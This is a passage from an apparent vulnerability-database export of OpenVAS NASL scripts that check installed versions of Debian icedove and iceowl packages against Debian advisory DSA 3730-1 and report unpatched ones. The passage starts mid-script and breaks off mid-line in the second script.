((res = isdpkgvuln(pkg:\"icedove-l10n-ja\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ko\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-lt\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-nb-no\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-nl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-nn-no\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-pa-in\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-pl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-pt-br\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-pt-pt\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-rm\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ro\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ru\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-si\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-sk\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-sl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-sq\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-sr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-sv-se\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ta-lk\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-tr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-uk\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-vi\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-zh-cn\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-zh-tw\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ar\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-be\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-bg\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-bn-bd\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-br\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ca\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-cs\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-cy\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-da\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-de\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-el\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-en-gb\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-es-ar\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-es-es\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-et\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-eu\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-fi\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-fr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-fy-nl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ga-ie\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-gd\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-gl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-he\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-hr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-hu\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-hy-am\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-id\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-is\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-it\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ja\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ko\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-lt\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-nb-no\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-nl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-nn-no\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-pa-in\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-pl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-pt-br\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-pt-pt\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-rm\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ro\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ru\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-si\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-sk\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-sl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-sq\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-sr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-sv-se\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-ta-lk\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-tr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-uk\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-vi\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-zh-cn\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceowl-l10n-zh-tw\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-29T18:35:10", "description": "Multiple security issues have been found\nin Icedove, Debian", "cvss3": {}, "published": "2016-12-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3730-1 (icedove - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9074", "CVE-2016-9066"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703730", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703730", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3730.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3730-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703730\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", \"CVE-2016-5297\",\n \"CVE-2016-9066\", \"CVE-2016-9074\", \"CVE-2016-9079\");\n script_name(\"Debian Security Advisory DSA 3730-1 (icedove - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-11 00:00:00 +0100 (Sun, 11 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3730.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"icedove on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 1:45.5.1-1~deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:45.5.1-1 or earlier.\n\nWe recommend that you upgrade your icedove packages.\");\n script_tag(name:\"summary\", value:\"Multiple security issues have been found\nin Icedove, Debian's version of the Mozilla Thunderbird mail client: Multiple memory\nsafety errors, same-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-all\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ar\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ast\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-be\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-bg\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-bn-bd\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-br\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ca\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-cs\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-da\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-de\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-el\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-en-gb\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-es-ar\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-es-es\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-et\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-eu\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-fi\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-fr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-fy-nl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ga-ie\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-gd\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-gl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-he\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-hr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-hu\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-hy-am\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-id\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-is\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-it\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ja\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ko\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-lt\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-nb-no\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-nl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-nn-no\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-pa-in\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-pl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-pt-br\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-pt-pt\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-rm\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ro\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ru\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-si\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-sk\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-sl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-sq\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-sr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-sv-se\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-ta-lk\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-tr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-uk\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-vi\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-zh-cn\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"icedove-l10n-zh-tw\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ar\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-be\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-bg\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-bn-bd\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-br\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ca\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-cs\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 